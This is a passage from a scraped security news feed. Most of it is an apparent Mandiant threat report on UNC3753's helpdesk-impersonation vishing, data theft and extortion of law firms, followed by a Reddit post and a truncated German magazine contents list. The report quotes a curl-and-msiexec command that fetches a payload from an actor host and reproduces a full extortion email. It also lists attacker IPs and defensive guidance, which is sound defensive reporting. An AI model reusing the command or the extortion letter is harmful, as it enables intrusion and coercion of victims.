        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/seeking-counsel-fig1.max-1000x1000.png" alt="UNC3753 Attack Lifecycle">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="x6e79">Figure 1: UNC3753 attack lifecycle</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Initial Access via IT Helpdesk Impersonation</span></h4>
<p><span>The core of UNC3753's entry mechanism relies on targeted vishing. Mandiant has observed the group targeting personnel across all seniority levels, who are often publicly listed on the organization’s websites, to harvest phone numbers and email addresses. Acting as members of the organization's internal IT helpdesk or security team, threat actors place direct calls to these employees. </span></p>
<p><span>The callers use a variety of verbal instructions to guide target behavior. Under the guise of addressing a security issue or aiding with a corporate data migration project, they build trust and direct the target to join a screen-sharing session.</span></p>
<h4><span>Remote Screen Control and Legitimate Tool Abuse</span></h4>
<p><span>Once the target is engaged, the threat actors bypass conventional automated boundary security and email filtering controls by instructing the user to download and execute screen-sharing applications. </span></p>
<h5><span>Screen-Sharing Utilities</span></h5>
<p><span>UNC3753 instructs targets to initiate remote desktop and support sessions using built-in or commercial services, including Zoom, Microsoft Terminal Services, Microsoft Teams, and Quick Assist. During a Teams-facilitated intrusion, the threat actor held five distinct calls with the same target over a three-day period.</span></p>
<h5><span>Commercial RMM Agents</span></h5>
<p><span>UNC3753 frequently attempts to establish more persistent access by social engineering targets into downloading AnyDesk, Bomgar, or Zoho Assist installers. In one engagement, the threat actor attempted to install a "SuperOps RMM agent" by convincing the target to download and execute a payload via a cURL command.</span></p>
<h5><span>Message Delivery via Privnote</span></h5>
<p><span>Threat actors consistently utilize </span><code>privnote[.]com,</code><span> a web-based, self-destructing text utility, to transmit installation links and commands to targets. This evasion technique ensures that copy-paste vectors leave no permanent footprint on endpoint browsers or chat logs.</span></p>
<p><span>Example cURL command staging string observed in UNC3753 remote sessions:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" &amp;&amp; msiexec /i "SuperOps.msi" /quiet</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>Infrastructure Pivoting and Local Staging</span></h4>
<p><span>Intrusions have abused Bring Your Own Device (BYOD) remote environments to access internal enterprise assets. In separate Mandiant Consulting cases, UNC3753 established Zoom sessions directly on targets' personal BYOD endpoints. Using these compromised personal laptops, they accessed corporate virtual desktop infrastructure (VDI) using native client platforms, such as Windows 365 (</span><code>Windows365.exe</code><span>) or Citrix clients. </span></p>
<p><span>Once VDI environment access is secured, the threat actors pivot to corporate file systems:</span></p>
<ol>
<li aria-level="1">
<p role="presentation"><span>System Enumeration: The threat actors map local directories, enumerate active OneDrive folders, and crawl mapped network drives.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Document Management Targeted Harvesting: Threat actors target specific legal and document storage repositories.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Keyword Search and File Staging: Threat actors use specific keyword search functions within iManage to locate highly sensitive folders containing tax logs (Forms W-2, W-9, and 1099), audit files, corporate client agreements, and Social Security numbers (SSNs). Staged results are compiled and sorted within target-accessible subdirectories, primarily inside the user's Downloads folder or native Roaming profile path.</span></p>
</li>
</ol>
<h3><span>Data Theft</span></h3>
<p><span>UNC3753 exfiltrates the staged data using a variety of methods to bypass security controls. They frequently use portable versions of WinSCP or Rclone. In other instances, they simply log into a threat actor-controlled consumer file sharing account directly within the victim's web browser and batch upload the stolen files.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Cloud Storage Staging: Threat actors instruct targets—or directly control their screens—to drag and drop staged folders into threat actor-controlled consumer file sharing accounts. In several intrusions, the exfiltration destination included folders explicitly renamed to mimic the victim organization's branding.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>FTP Utilities: When browser-based uploads are restricted by endpoint controls, threat actors download FTP and SFTP client binaries, primarily WinSCP, to exfiltrate bulk packages. In one incident, the threat group exfiltrated 1.7 gigabytes of data from a target's local OneDrive folder to a Google Drive account before pivoting to a VDI session and exfiltrating an additional 14.4 gigabytes using WinSCP. Google has taken action against this actor by disabling the Drive accounts and assets associated with this activity.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Email Forwarding: The threat actors have also had victims stage files from internal iManage repositories and instructed them to send the files to threat actor-controlled consumer email addresses from the target's mailbox.</span></p>
</li>
</ul>
<h3><span>Threat Actor Extortion Tactics</span></h3>
<p><span>The threat cluster delivers unbranded extortion communications via email shortly after successfully stealing data, often within 30 minutes of exiting the target environment. </span></p>
<p><span>These highly aggressive extortion letters give organizations a three-day deadline to respond and initiate ransom negotiations. If the victim organization is unresponsive, the threat actors declare they will call and email target employees and external clients directly to alert them of the data breach. The extortion letters explicitly emphasize that the leak will compromise client trust, invite substantial regulatory fines, and suggest that external clients sue the victim organization for data mishandling. Additionally, as part of a follow-on message the group has threatened to publish all exfiltrated archives on the LEAKEDDATA data leak site (DLS).</span></p>
<h4><span>Sample Extortion Email</span></h4></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td>
<p><code>Subject: [Victim Name] has lost confidential data of their clients. Very Important!</code></p>
<p><code>Hello,</code></p>
<p><code>We have to inform you that we got access to the [Victim Name] corporation's database and took a very large dataset. We have been in your network for weeks in multiple systems , aiming for proprietary and confidential files, and were able to obtain what We were looking for as well as the data of many clients. &lt;mentions the general nature of the stolen documents&gt;. This is not a joke or a scam.</code></p>
<p><code>This is a real problem that puts the existence of your firm in danger and to prove it We have attached screenshots that are confirming the possession of the files.</code></p>
<p><code>Reply to Our email and We will show you the complete file tree and actual files.</code></p>
<p><code>We are an elite group who's been in this business for a very long time, We have Our own website where We post the data and thousands of individuals follow Our work , and connections in different business social media. But, what's more important, is that We want to return your data peacefully and as soon as possible.</code></p>
<p><code>We will guarantee you the complete database deletion from Our servers, video evidence of us deleting the files, privacy of our communication and Our security advice with an explanation of how We got into your network and how to fix the vulnerability that We found.</code></p>
<p><code>In order for us to solve this problem you need to send us an email and start communicating with us. We hope to find a financial solution that will be acceptable for both parties.</code></p>
<p><code>In case of ignorance or no agreement, We will notify your employees, partners and customers, after which We will publish your data. You will receive claims from individuals, and legal entities for information leakage and breach of contracts, your current deals will be terminated. Journalists and others will dig into your documents, finding inconsistencies or violations in them. Your organization will lose its reputation, shares will fall in price, and your organization will be forced to close.</code></p>
<p><code>Let us remind you that your data can be used by many other hackers and criminals on the dark web as well as your competitors and enemies in case We leak the data.</code></p>
<p><code>Law enforcement will not help you, We are out of their jurisdiction, and We already took all the critical data. They will only tell you not to communicate with us and be the first ones to fine you.</code></p>
<p><code>As soon as you reach out, We will show you all the files that We obtained, so you can understand the seriousness of this problem and the necessity to proceed to the negotiations.</code></p>
<p><code>Our communication will stay 100% private before and after the agreement. We can show the proof of it as well.</code></p>
<p><code>All further communication can be done through this email address.</code></p>
<p><code>Do not waste any time as it is ticking . Text us today, so We don't have to start calling your employees tomorrow. You will have 3 days to start communicating.</code></p>
<p><code>Here We attached some screenshots confirming all the above. Respond to this email and We will send you the file tree.</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Figure 2: <span>UNC3753 e</span><span>xtortion note example</span></span></p></div>
<div class="block-paragraph_advanced"><h3><span>Data Leak Site</span></h3></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/seeking-counsel-fi3.max-1000x1000.png" alt="LEAKEDDATA DLS (partially redacted; cropped)">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="20n3k">Figure 3: LEAKEDDATA DLS (partially redacted; cropped)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Suspected UNC3753 Activity Involving Physical Access</span></h4>
<p><span>While UNC3753 primarily relies on digital vectors, GTIG assesses that associated threat actors have also attempted direct data theft using physical, in person access. This escalating tactic is corroborated by a recent </span><a href="https://www.ic3.gov/CSA/2026/260526.pdf" rel="noopener" target="_blank"><span>FBI Cyber FLASH Alert</span></a><span> highlighting instances where Silent Ransom Group threat actors leveraged physical office access to exfiltrate corporate data via removable USB media.</span></p>
<p><span>According to the FBI advisory, if remote social engineering attempts fail, actors will send an individual to a victim's physical location. The onsite threat actor will claim they need to image the device or create local backups to address a security issue. Once they gain access to the endpoint, they attempt to exfiltrate corporate data directly to an external drive.</span></p>
<p><span>Although limited forensic evidence and the absence of a subsequent extortion attempt prevent formal attribution, GTIG assesses that these physical intrusions are likely associated with UNC3753 based on structural, timeline, and targeting overlaps.</span></p>
<h3><span>Attribution</span></h3>
<p><span>GTIG attributes this campaign and related social engineering operations to UNC3753 based on infrastructure overlaps, domain registrar tracking, victimology, and target staging directories. </span><span>UNC3753 (aliases: "Luna Moth," “Chatty Spider,” and "Silent Ransom Group (SRG)") is a financially motivated threat cluster active since at least March 2022. UNC3753 has TTP overlaps with UNC2686, a threat cluster that conducted "Bazarcall" style campaigns dating to early 2021. UNC3753 deployed LOCKBIT.BLACK in 2022, but has since prioritized data theft extortion-only operations typically involving threats to post stolen files to the LEAKEDDATA DLS. The threat cluster relies heavily on Remote Monitoring and Management (RMM) tools, unlike UNC2686 which deployed BAZARLOADER variants as well as TRICKBOT, URSNIF, and SILENTNIGHT. Initially, UNC3753 used subscription-themed billing email lures (such as fake software renewal alerts), typically with PDF attachments containing phone numbers for actor-controlled call centers. Beginning around March 2025, the cluster shifted tactics to pose as internal corporate IT helpdesk staff.</span></p>
<h3><span>Remediation and Hardening</span></h3>
<p><span>To mitigate the risk of voice phishing, physical office intrusions, and unauthorized endpoint control, GTIG recommends that organizations implement the following mitigation controls:</span></p>
<h4><span>User Education</span></h4>
<p><span>Conduct user awareness training specifically tailored to UNC3753 tactics, techniques, and procedures.</span></p>
<h4><span>Physical Access and Verification Policies</span></h4>
<p><span>Implement rigid out-of-band identity verification controls for all external contractors, technical staff, and facilities visitors. Mandate the following physical controls:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Require visitors to display official credentials and photo identification.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Require front-desk staff to copy and log all physical visitor IDs before granting access.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Verify the arrival of all technicians against pre-scheduled work orders directly with the verified parent organization or helpdesk dispatcher.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Enforce a policy requiring physical technical service personnel to be escorted by a corporate supervisor at all times.</span></p>
</li>
</ul>
<h4><span>Remote Access Conditional Access Controls</span></h4>
<p><span>Implement remote access conditional access policies to ensure only corporate owned devices can authenticate to Virtual Desktop Instance (VDI) or Virtual Private Network (VPN) devices. This facilitates increased organizational control and visibility for potential Remote Monitoring and Management usage. </span></p>
<h4><span>Enforce Strict RMM and Screen-Sharing Software Controls</span></h4>
<p><span>Audit corporate environments to block the installation and execution of unauthorized remote monitoring, management, and support utilities. Enforce application control policies (e.g. Windows Defender Application Control or third-party endpoint protection tools) to restrict execution of non-approved binaries. Organizations may also consider restricting interactive screen-control features within authorized virtual meeting platforms like Zoom and Teams. </span></p>
<h4><span>Endpoint Removable Media Hardening</span></h4>
<p><span>To neutralize physical exfiltration vectors, disable read/write capabilities for all external USB mass storage devices. Enforce Group Policy Objects (GPOs) or MDM configurations to restrict:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>USB storage device installation.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Removable media access.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Optical media writes on all corporate endpoints and BYOD systems utilizing VDI entry.</span></p>
</li>
</ul>
<h4><span>Network Monitoring and Egress Control</span></h4>
<p><span>Monitor firewall logs, network flows, and endpoint execution logs for indicative exfiltration and staging actions. Specifically:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Block or alert on outbound connections to unauthorized file-sharing APIs and emails.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Ensure full session logging with bytes transferred is enabled within Firewall log configurations.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Monitor SSH traffic (Port 22) from internal VDIs and endpoints for high-volume WinSCP and Rclone transfers.</span></p>
</li>
</ul>
<h4><span>Application Log and Access Auditing</span></h4>
<p><span>Review authentication and access metrics for critical document stores to identify bulk harvesting profiles.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Configure real-time alerts in iManage, SharePoint, and corporate email directories for rapid file searches, search-term spikes, and mass file downloads.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Implement multi-factor authentication (MFA) on business critical data repository applications, such as iManage. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Implement strict BYOD authentication controls, requiring MFA step-up queries when accessing VDI nodes.</span></p>
</li>
</ul>
<h3><span>Outlook and Implications</span></h3>
<p><span>The targeting of US legal and professional services organizations by financially motivated actors is a persistent industry risk. Legal services firms represent high-value targets for extortion actors. They maintain concentrated repositories of extremely sensitive client transaction files, merger and acquisition plans, client trade secrets, and corporate regulatory reports. Threat groups recognize that legal entities are subject to heavy reputational and regulatory exposure and may be highly motivated to resolve extortion situations quietly to protect their professional standing.</span></p>
<p><span>Threat actors recognize that targeting the human element—specifically using voice-guided social engineering—enables them to easily bypass robust technical perimeters, web security gateways, and MFA configurations. </span></p>
<p><span>Finally, the integration of in-person, physical intrusions represents an escalation in threat capability. While log-based defenses and endpoint telemetry have matured, physical corporate boundaries are frequently protected only by administrative procedures. Organizations must transition to a unified security posture that treats physical facility access control and endpoint-based hardware policies as equal components of their defensive perimeter.</span></p>
<h3><span>Data Leak Site (DLS)</span></h3>
<p><span>UNC3753 utilizes the following web platform to disclose the identities of victims and their compromised data.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>hxxps[:]//business-data-leaks[.]com</span></p>
</li>
</ul>
<h3><span>Phishing Domains</span></h3>
<p><span>GTIG identified infrastructure registrations by suspected UNC3753 actors utilizing specific naming conventions, assessed as supporting their ongoing social engineering and vishing activities.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>&lt;organization&gt;-itdesk[.]com</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>&lt;organization&gt;-it[.]com</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>&lt;organization&gt;-helpdesk[.]com</span></p>
</li>
</ul>
<h3><span>Indicators of Compromise (IOCs) </span></h3>
<p><span>To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a <a href="https://www.virustotal.com/gui/collection/598281d2c6de83adf1505ee6077608d0c043623d477e2884d36d65e90686d67a/summary" rel="noopener" target="_blank">GTI Collection</a> for registered users.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>IOC Type</strong></p>
</td>
<td>
<p><strong>Indicator</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>IPv4 Address</span></p>
</td>
<td>
<p><span>192.236.147.131</span></p>
</td>
</tr>
<tr>
<td>
<p><span>IPv4 Address</span></p>
</td>
<td>
<p><span>192.236.147.138</span></p>
</td>
</tr>
<tr>
<td>
<p><span>IPv4 Address</span></p>
</td>
<td>
<p><span>193.141.60.212</span></p>
</td>
</tr>
<tr>
<td>
<p><span>IPv4 Address</span></p>
</td>
<td>
<p><span>192.236.154.158</span></p>
</td>
</tr>
<tr>
<td>
<p><span>IPv4 Address</span></p>
</td>
<td>
<p><span>192.236.146.173</span></p>
</td>
</tr>
<tr>
<td>
<p><span>IPv4 Address</span></p>
</td>
<td>
<p><span>174.169.162.62</span></p>
</td>
</tr>
<tr>
<td>
<p><span>IPv4 Address</span></p>
</td>
<td>
<p><span>64.94.84.97</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3><span>Google Security Operations (SecOps)</span></h3>
<p><span>Google SecOps customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Execute MSI Files Downloaded via Curl</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspected Rclone Exfiltration</span></p>
</li>
</ul>
<h3><span>MITRE ATT&amp;CK</span></h3></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Tactic</strong></p>
</td>
<td>
<p><strong>Technique ID</strong></p>
</td>
<td>
<p><strong>Technique Name</strong></p>
</td>
</tr>
<tr>
<td rowspan="2">
<p><strong>Initial Access</strong></p>
</td>
<td>
<p><span>T1566.004</span></p>
</td>
<td>
<p><span>Phishing: Spearphishing Voice</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1133</span></p>
</td>
<td>
<p><span>External Remote Services</span></p>
</td>
</tr>
<tr>
<td rowspan="4">
<p><strong>Execution</strong></p>
</td>
<td>
<p><span>T1204.002</span></p>
</td>
<td>
<p><span>User Execution: Malicious File</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1059.001</span></p>
</td>
<td>
<p><span>Command and Scripting Interpreter: PowerShell</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1059.003</span></p>
</td>
<td>
<p><span>Command and Scripting Interpreter: Windows Command Shell</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1569.002</span></p>
</td>
<td>
<p><span>System Services: Service Execution</span></p>
</td>
</tr>
<tr>
<td rowspan="2">
<p><strong>Persistence</strong></p>
</td>
<td>
<p><span>T1053.005</span></p>
</td>
<td>
<p><span>Scheduled Task/Job: Scheduled Task</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1547.001</span></p>
</td>
<td>
<p><span>Boot or Logon Autostart Execution: Registry Run Keys</span></p>
</td>
</tr>
<tr>
<td rowspan="4">
<p><strong>Defense Evasion</strong></p>
</td>
<td>
<p><span>T1036.005</span></p>
</td>
<td>
<p><span>Masquerading: Match Legitimate Name or Location</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1553.002</span></p>
</td>
<td>
<p><span>Subvert Trust Controls: Code Signing</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1562.001</span></p>
</td>
<td>
<p><span>Impair Defenses: Disable or Modify Tools</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1070.001</span></p>
</td>
<td>
<p><span>Indicator Removal: Clear Windows Event Logs</span></p>
</td>
</tr>
<tr>
<td rowspan="2">
<p><strong>Credential Access</strong></p>
</td>
<td>
<p><span>T1003.001</span></p>
</td>
<td>
<p><span>OS Credential Dumping: LSASS Memory</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1003.002</span></p>
</td>
<td>
<p><span>OS Credential Dumping: Security Account Manager</span></p>
</td>
</tr>
<tr>
<td rowspan="3">
<p><strong>Discovery</strong></p>
</td>
<td>
<p><span>T1083</span></p>
</td>
<td>
<p><span>File and Directory Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1135</span></p>
</td>
<td>
<p><span>Network Share Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1046</span></p>
</td>
<td>
<p><span>Network Service Discovery</span></p>
</td>
</tr>
<tr>
<td rowspan="3">
<p><strong>Lateral Movement</strong></p>
</td>
<td>
<p><span>T1219</span></p>
</td>
<td>
<p><span>Remote Access Software</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1021.001</span></p>
</td>
<td>
<p><span>Remote Services: Remote Desktop Protocol</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1021.004</span></p>
</td>
<td>
<p><span>Remote Services: SSH</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Collection</strong></p>
</td>
<td>
<p><span>T1005</span></p>
</td>
<td>
<p><span>Data from Local System</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Command &amp; Control</strong></p>
</td>
<td>
<p><span>T1572</span></p>
</td>
<td>
<p><span>Protocol Tunneling</span></p>
</td>
</tr>
<tr>
<td rowspan="3">
<p><strong>Exfiltration</strong></p>
</td>
<td>
<p><span>T1020</span></p>
</td>
<td>
<p><span>Automated Exfiltration</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1567.002</span></p>
</td>
<td>
<p><span>Exfiltration Over Web Service: Exfiltration to Cloud Storage</span></p>
</td>
</tr>
<tr>
<td>
<p><span>T1052.001</span></p>
</td>
<td>
<p><span>Exfiltration Over Physical Medium</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Impact</strong></p>
</td>
<td>
<p><span>T1486</span></p>
</td>
<td>
<p><span>Data Encrypted for Impact</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Which useful sh scripts you guys have running?]]></title>
<description><![CDATA[I have one that checks the space on my disks and if its below a threshold, it sends me an alert email. My pc is a Jellyfin server, so i have to keep track of the disk space before downloading anything else, so this scripts helps a lot. https://imgur.com/a/oh8a2LD I also have Rclone backing up a f...]]></description>
<link>https://tsecurity.de/de/3558185/linux-tipps/which-useful-sh-scripts-you-guys-have-running/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3558185/linux-tipps/which-useful-sh-scripts-you-guys-have-running/</guid>
<pubDate>Sat, 30 May 2026 03:50:34 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I have one that checks the space on my disks and if its below a threshold, it sends me an alert email. My pc is a Jellyfin server, so i have to keep track of the disk space before downloading anything else, so this scripts helps a lot.</p> <p><a href="https://imgur.com/a/oh8a2LD">https://imgur.com/a/oh8a2LD</a></p> <p>I also have Rclone backing up a few folders to my Google Drive, and another script that backs up my dotfiles to a Github repo.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Subway909"> /u/Subway909 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1trbh9s/which_useful_sh_scripts_you_guys_have_running/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1trbh9s/which_useful_sh_scripts_you_guys_have_running/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[LinuxWelt 4/2026 am Kiosk: Linux absichern!]]></title>
<description><![CDATA[Linux sicher nutzen: Linux gilt als vergleichsweise wenig anfällig für Schadsoftware. Der Auftaktartikel des Sicherheits-Specials erklärt die Gründe dafür und zeigt, welche Maßnahmen dennoch wichtig sind, um das System bestmöglich zu schützen.



Firewall und Virenschutz unter Linux: Braucht Linu...]]></description>
<link>https://tsecurity.de/de/3556549/it-nachrichten/linuxwelt-42026-am-kiosk-linux-absichern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556549/it-nachrichten/linuxwelt-42026-am-kiosk-linux-absichern/</guid>
<pubDate>Fri, 29 May 2026 10:47:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><strong>Linux sicher nutzen:</strong> Linux gilt als vergleichsweise wenig anfällig für Schadsoftware. Der Auftaktartikel des Sicherheits-Specials erklärt die Gründe dafür und zeigt, welche Maßnahmen dennoch wichtig sind, um das System bestmöglich zu schützen.</p>



<p><strong>Firewall und Virenschutz unter Linux:</strong> Braucht Linux überhaupt zusätzliche Sicherheitssoftware? Der Beitrag erläutert, wann sich der Einsatz von Firewall oder Virenscanner empfiehlt und welche Lösungen sinnvoll sind.</p>



<p><strong>Passwörter zuverlässig verwalten:</strong> Starke Passwörter sind für Onlinekonten unverzichtbar. Passwortmanager helfen dabei, Zugangsdaten sicher zu speichern und den Login komfortabler zu gestalten.</p>



<p>Das und vieles mehr lesen Sie in der neuen LinuxWelt 4/2026 – jetzt am Kiosk oder bequem im PC-WELT-Shop bestellen!</p>



<h2 class="wp-block-heading">Eine Auswahl der Themen in der neuen LinuxWelt: </h2>



<h2 class="wp-block-heading">Grundlagen</h2>



<ul class="wp-block-list">
<li><strong>Ist Linux „sicher“?</strong> Codefehler sind Alltag: Warum das wenig über die Angreifbarkeit eines Systems aussagt</li>



<li><strong>Die Heft-DVD.</strong> Alle Inhalte der DVD: Distributionen, Boottools, Software, XXL-Booklet</li>



<li><strong>Neu: Ubuntu 26.04 auf DVD.</strong> Steckbriefe zum neuen Ubuntu und Q4-OS sowie zu drei weiteren Distributionen der Download-DVD</li>



<li><strong>Linux-News.</strong> News &amp; Trends: Kernel, Systeme, Open Source und IT-Sicherheit</li>



<li><strong>Linux-Updates offline.</strong> Updates ohne Internet: Die Methode lohnt bei mehreren Systemen</li>



<li><strong>Bootstick für jeden Zweck.</strong> Ventoy kann mehr als ISO: Das Tool startet auch VHD- und VDI-Images</li>
</ul>



<h2 class="wp-block-heading">Special I – IT-Sicherheit mit Linux</h2>



<ul class="wp-block-list">
<li><strong>Mehr Sicherheit für Linux.</strong> Router, WLAN &amp; Updates: Das sind die grundlegenden Regeln für ein sicheres Heimnetz</li>



<li><strong>Firewall &amp; Virenscanner.</strong> Braucht Linux zusätzliche Sicherheitssoftware wie Windows?</li>



<li><strong>Secure Boot und Linux.</strong> Auslaufende Zertifikate: So erhalten Sie weiter Bootschutz</li>



<li><strong>Passwörter sicher verwalten.</strong> Browser &amp; Keepassxc: So machen Sie unbequeme Passwörter bequem</li>



<li><strong>Software-Polizist Apparmor.</strong> Verbreiteter Standard: Ist diese Komponente wirklich notwendig?</li>



<li><strong>Linux-VM für Windows.</strong> Mit Linux ins Web: Das schützt den Windows-Host in doppelter Hinsicht</li>
</ul>



<h2 class="wp-block-heading">Special II – Alte Hardware neu genutzt</h2>



<ul class="wp-block-list">
<li><strong>Geeignete Alt-Hardware.</strong> Sinnvolles Recycling: Was wirklich zählt und welche Gerätemängel tolerierbar sind</li>



<li><strong>Oldies als Desktop.</strong> Schlanke Distributionen und Remote-Entlastung: So leisten alte Notebooks wieder gute Dienste</li>



<li><strong>Oldies als Server.</strong> Daten- und Webserver: Diese Aufgaben kann praktisch jedes Altgerät mühelos übernehmen</li>



<li><strong>Weitere Altgeräte.</strong> Smartphones, Router, Festplatten: Für vieles gibt es neue Rollen</li>
</ul>



<h2 class="wp-block-heading">Software &amp; KI</h2>



<ul class="wp-block-list">
<li><strong>Mit KI Fotos animieren.</strong> KI-Werkzeuge, starke Hardware, Fotos und ein Auftragsprompt: So lernen Bilder laufen</li>



<li><strong>Programmieren ohne Kenntnis?</strong> KI-Coding-Agenten: Ein Selbstversuch testet die Fähigkeiten von Vibe-Coding am Beispiel Antigravity &amp; Open Code</li>



<li><strong>Meme-Generator Memerist.</strong> Einfaches Werkzeug mit schnellen Ergebnissen: Memerist hilft bei der Erstellung witziger Memes</li>



<li><strong>Interaktive Jupyter-Notebooks.</strong> Code &amp; Markdown: Jupyter-Dateien verbinden Coding und Dokumentation</li>



<li><strong>Produktiv mit Koncentro.</strong> Das Tool Koncentro kombiniert To-do-Listen mit Timer und Webblocker</li>



<li><strong>Spezialdistribution Gnu Guix.</strong> Reinheitsgebot: Die Distribution Guix garantiert pures Open Source</li>
</ul>



<h2 class="wp-block-heading">Hardware &amp; Netzwerk</h2>



<ul class="wp-block-list">
<li><strong>Fernhilfe für Fritzbox &amp; Co.</strong> Der Router im Fernzugriff: So bringen Sie Ihre technische Hilfestellung via Internet zu Freunden und Bekannten</li>



<li><strong>Diet Pi mit Owncloud.</strong> Cloud auf Diät: Diet Pi mit schlanker „Owncloud Infinite Scale“ stemmt jede Hardware</li>



<li><strong>AI HAT+ am Raspberry Pi.</strong> Teuer, kompliziert und aktuell ungenügend: Diese Investition verdient noch keine Empfehlung</li>



<li><strong>Nextcloud-Backup.</strong> Nicht ganz so einfach: Nextcloud-Sicherungen erfordern Strategie</li>



<li><strong>PDFs bearbeiten.</strong> PDF-Bearbeitung: Bento kann alles, zentral im Netz via Browser</li>



<li><strong>Monitor für Dienste.</strong> Uptime Kuma: Der Monitor wacht über Dienste, Ports und Websites</li>



<li><strong>Clients für Clouddienste.</strong> Spezialisten und Rclone: So kommt Linux auf jede Cloud</li>
</ul>



<h2 class="wp-block-heading">Praxis</h2>



<ul class="wp-block-list">
<li><strong>Einsteigertipps: Dateien löschen mit Spezialtools.</strong> Löschen ohne Risiko: Tools und Tipps helfen beim Aufräumen</li>



<li><strong>Einsteigertipps: Linux für Einsteiger vorbereiten.</strong> Vorkonfiguration: So erleichtern Sie anderen den Linux-Einstieg</li>



<li><strong>Terminaltipps.</strong> Grundlagen und neue Tricks zu Bash-Shell, SSH, Htop</li>



<li><strong>Hardwaretipps.</strong> Tipps zur Datenrettung, zu NVMe, LAN-Geschwindigkeit und Akkus</li>



<li><strong>Softwaretipps.</strong> Tipps zu Libre Office, Only Office, Schriften, Handbrake u. v. m.</li>



<li><strong>Desktoptipps.</strong> Tricks zum neuem Gnome 50 und zu Cinnamon und KDE</li>
</ul>



<h2 class="wp-block-heading">Das finden Sie auf der Heft-DVD:</h2>



<ul class="wp-block-list">
